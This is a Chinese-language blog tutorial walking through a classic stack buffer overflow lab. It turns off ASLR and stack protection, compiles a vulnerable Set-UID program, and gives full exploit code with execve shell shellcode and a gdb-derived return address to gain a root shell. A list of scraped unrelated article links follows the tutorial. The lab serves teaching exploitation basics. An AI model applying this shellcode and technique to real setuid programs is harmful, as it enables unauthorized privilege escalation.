缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。

实验准备

之前一直听说缓冲区溢出攻击,具体是什么,怎么回事。一直没有学习过。正好今天有时间。一边学习一边写下此文。

本次实验只是想体会了解一下缓冲区溢出攻击,复现一次简单的提权过程。没有较为深入的学习。而且为了减少实验的复杂程度剔除了很多障碍。

为了方便观察汇编语言,本次操作建议在32位Ubuntu | linux操作系统中进行。

如果你目前的环境是64位可以输入下面的命令,安装一些用于编译 32 位 C 程序的软件包。之后用于使用32位程序包编译c程序。

$ sudo apt-get update

$ sudo apt-get install -y lib32z1 libc6-dev-i386

$ sudo apt-get install -y lib32readline-gplv2-dev

初始设置

在 Ubuntu 和其他一些 Linux 系统中,使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。因此为了方便(捂头)本次实验中,使用以下命令关闭这一功能:

$ sudo sysctl -w kernel.randomize_va_space=0

此外,操作系统为了进一步防范缓冲区溢出攻击或其它利用 shell 程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个 Set-UID 程序调用一个 shell,也不能在这个 shell 中保持 root 权限。linux 系统中,/bin/sh实际是指向 /bin/bash或 /bin/dash的一个符号链接。

在/bin/bash中存在这个防护措施。所以·····还是为了实验的简单,这里使用另一个 shell 程序(zsh)代替/bin/bash。使用下面的指令设置 zsh 程序:

我的实验环境和本地不同,具体命令可能会有所改变。

$ sudo su

$ cd /bin

$ rm sh

$ ln -s zsh sh

$ exit

shellcode

一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实现其他功能,这段代码就是 shellcode。

#include

int main()

{

char *name[2];

name[0] = "/bin/sh";

name[1] = NULL;

execve(name[0], name, NULL);

}

本次实验的 shellcode,就是刚才代码的汇编版本:

\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

漏洞程序

首先我们先在tmp目录建立一个漏洞程序stack.c

cd /tmp

vi stack.c

i切换插入模式,输入下面的代码

#include

#include

#include

int bof(char *str)

{

char buffer[12];

/* The following statement has a buffer overflow problem */

strcpy(buffer, str);

return 1;

}

int main(int argc, char **argv)

{

char str[517];

FILE *badfile;

badfile = fopen("badfile", "r");

fread(str, sizeof(char), 517, badfile);

bof(str);

printf("Returned Properly\n");

return 1;

}

/* This program has a buffer overflow vulnerability. */

/* Our task is to exploit this vulnerability */

通过代码可以知道,程序会读取一个名为“badfile”的文件,并将文件内容装入“buffer”。

然后esc 输入:wq保存退出。输入cat stack.c检查一下程序是否完整。

之后编译该程序,并设置 SET-UID。命令如下:

$ sudo su

$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c

$ chmod u+s stack

$ exit

GCC编译器有一种栈保护机制来阻止缓冲区溢出,所以在编译代码时需要用–fno-stack-protector关闭这种机制。 而 -z execstack用于允许执行栈。

-g参数是为了使编译后得到的可执行文档能用gdb调试。

攻击程序

建立这个程序的目的是攻击刚才的漏洞程序,并通过攻击获得 root 权限。下面开始。

同样在 /tmp目录下新建一个 exploit.c文件,输入如下代码:

#include

#include

#include

char shellcode[] =

"\x31\xc0" //xorl %eax,%eax

"\x50" //pushl %eax

"\x68""//sh" //pushl $0x68732f2f

"\x68""/bin" //pushl $0x6e69622f

"\x89\xe3" //movl %esp,%ebx

"\x50" //pushl %eax

"\x53" //pushl %ebx

"\x89\xe1" //movl %esp,%ecx

"\x99" //cdq

"\xb0\x0b" //movb $0x0b,%al

"\xcd\x80" //int $0x80

;

void main(int argc, char **argv)

{

char buffer[517];

FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */

memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */

strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); //在buffer特定偏移处起始的四个字节覆盖sellcode地址

strcpy(buffer + 100, shellcode); //将shellcode拷贝至buffer,偏移量设为了 100

/* Save the contents to the file "badfile" */

badfile = fopen("./badfile", "w");

fwrite(buffer, 517, 1, badfile);

fclose(badfile);

}

注意上面的代码,\x??\x??\x??\x??处需要添上shellcode保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。而 strcpy(buffer+100,shellcode);这一句又告诉我们,shellcode保存在buffer + 100的位置。下面来获得我们需要添加的地址。

现在我们要得到 shellcode 在内存中的地址,需要使用gdb调试。输入命令:

$ gdb stack

//输入后开始调试stack文件。然后输入下面的命令

$ disass main

输入后可以看到调试的结果,第一个标红的代码是str起始的地方。第二个是我们需要设置断点,来获取地址的地方。

回车继续,分别输入

b *0x080484e8 //回车

r //回车

i r $esp //回车

成功返回了断点的地址:0xffffd060。现在可以退出了q 回车 y 回车。

根据语句 strcpy(buffer + 100,shellcode);还需要计算 shellcode的地址。 0xffffd060(十六进制) + 0x64(100的十六进制) = 0xffffd0c4(十六进制)

现在返回修改exploit.c文件!将\x??\x??\x??\x??修改为 \xc4\xd0\xff\xff

保存退出编辑,进行编译。

gcc -m32 -o exploit exploit.c

进行攻击&结果

先运行攻击程序exploit,再运行漏洞程序stack。whoami 是操作系统中用于查看当前有效用户名的命令。可见,通过攻击,获得了root 权限!

结语

到此一个简单的缓冲区溢出漏洞实验就结束了。此次收获还是挺多的,粗略的学习了一下基本原理。今后如果有机会的话会更深入的去学习。

php crypt函数缓冲区溢出漏洞,简单缓冲区溢出漏洞攻击实验相关推荐

  1. python 堆栈溢出_PWN简单堆栈溢出漏洞利用(一) | kTWO-个人博客

    摘要 本文将详细讲述PWN二进制漏洞中简单的堆栈利用,本文将从原理开始讲述,然后层层深入,让读者从理解到动手操作,能够跟着教程完成所有操作. 0x01 环境和程序准备 安装有pwntools的kali ...

  2. linux crypt函数

    linux crypt函数 1. crypt定义 #define _XOPEN_SOURCE /* See feature_test_macros(7) */ #include <unistd. ...

  3. 缓冲区溢出漏洞_缓冲区溢出漏洞简介

    缓冲区溢出漏洞 重点 (Top highlight) 缓冲 (Buffer) A buffer is a temporary storage, usually present in the physi ...

  4. 软件漏洞及缓冲区溢出

    软件漏洞及缓冲区溢出 文章作者:davy_yan 本文是我做溢出的一点心得,希望大家提出宝贵的修改意见,也希望对大家有一定的帮助:) 软件漏洞及缓冲区溢出 一.     缓冲区溢出的发展简史 1.   ...

  5. 分区起始位置参数溢出_IIS6.0缓冲区溢出漏洞深度分析(CVE-2017-7269)

    漏洞描述 开启WebDAV服务的IIS6.0存在缓冲区溢出漏洞可以任意代码执行,目前针对 Windows Server 2003 R2 可以稳定利用.在WebDAV服务的ScStoragePathFr ...

  6. mysql4.1.2缓冲区溢出漏洞_缓冲区溢出漏洞

    缓冲区溢出就是在大缓冲区数据向小缓冲区复制的过程中,由于没有注意到小缓冲区的边界,"撑爆"了较小的缓冲区,从而冲掉了和小缓冲区相邻内存区域的其他数据而引起的内存问题.缓冲区溢出是常 ...

  7. php组件缓冲区溢出漏洞,一个缓冲区溢出漏洞的简易教程

    这篇文章类似于"傻瓜系列之利用缓冲区溢出".在这类漏洞中,我们的做法是利用网络,程序控制器,输入等等,发送超大的数据缓冲区给程序,覆盖程序内存的重要部分.在这些缓冲区覆盖程序内存之 ...

  8. CSAPP:Attack Lab —— 缓冲区溢出攻击实验

    Warm-up X86-64寄存器和栈帧 X86-64有16个64位寄存器 : -%rax 作为函数返回值使用. - %rsp 栈指针寄存器,指向栈顶. - %rdi,%rsi,%rdx,%rcx,% ...

  9. java 缓冲区溢出_浅析缓冲区溢出

    最近一直在学习缓冲区溢出漏洞的攻击,但是关于这一块的内容还是需要很多相关知识的基础,例如编程语言及反汇编工具使用.所以研究透彻还需要不少的时间,这里简单的做一个学习的总结,通过具体的实验案例对缓冲区溢 ...

最新文章

  1. Swift2.0语言教程之类的属性
  2. 搞定系统设计 01:从 0 到百万用户的系统
  3. html5基础知识点常用标签
  4. SAP APF框架错误消息Filter is too complex的处理
  5. linux 测试程序性能,推荐一款Linux系统的性能测试软件
  6. CSS只是进化的一部分
  7. ARM Cortex-M3与Cortex-M4中断相关寄存器
  8. php三年经验 多少工资_PHP2年以上经验,在深圳工资能拿多少?
  9. ucGUI移植到ARM
  10. 董文永武汉大学计算机学院,董文永 - 教师简历 CV- Computer School of Wuhan University...
  11. 正点原子STM32(基于HAL库)1
  12. SPEA2算法原理及应用方向
  13. 弘辽科技:胡润研究院发布《2020胡润中国10强电商》榜单,第二名很意外
  14. CAD编辑指南7:新建空白图纸和新建表格、导入图片
  15. dedecms织梦后台模板layui框架
  16. f1签证计算机专业容易拒签吗,美国签证F1被拒,拒签调档出来原来是这个原因...
  17. centos命令(centos命令行复制粘贴)
  18. 汉语编程vs汉语写一元方程
  19. 基于诱捕器图像的飞蛾害虫自动检测
  20. AD域根据组名称获取DirectoryEntry对象

热门文章

  1. 亲戚关系计算器微信小程序源码是一款为避免遇到亲戚却不知道该怎么称呼时遇到的尴尬情况而开发的
  2. IDEA设置项目编码
  3. 面向对象的程序设计1 理解对象—— JS学习笔记2015-7-4(第75天)
  4. sql oracle 递归查询语句,oracle递归函数 oracle中SQL递归查询
  5. 锅炉结垢不停炉停车在线无酸清洗除垢技术需要注意二个问题
  6. 计算机的优势和劣势_什么是计算机二级证书?它比你想象中有用多了!
  7. UE4开发HTC cosmos 的按键映射
  8. 20个手机射频常见问答
  9. 如何防范被小人所害?就三点,招招戳其要害,大胆使用
  10. MySQL 中误删表数据,如何快速恢复丢失的数据?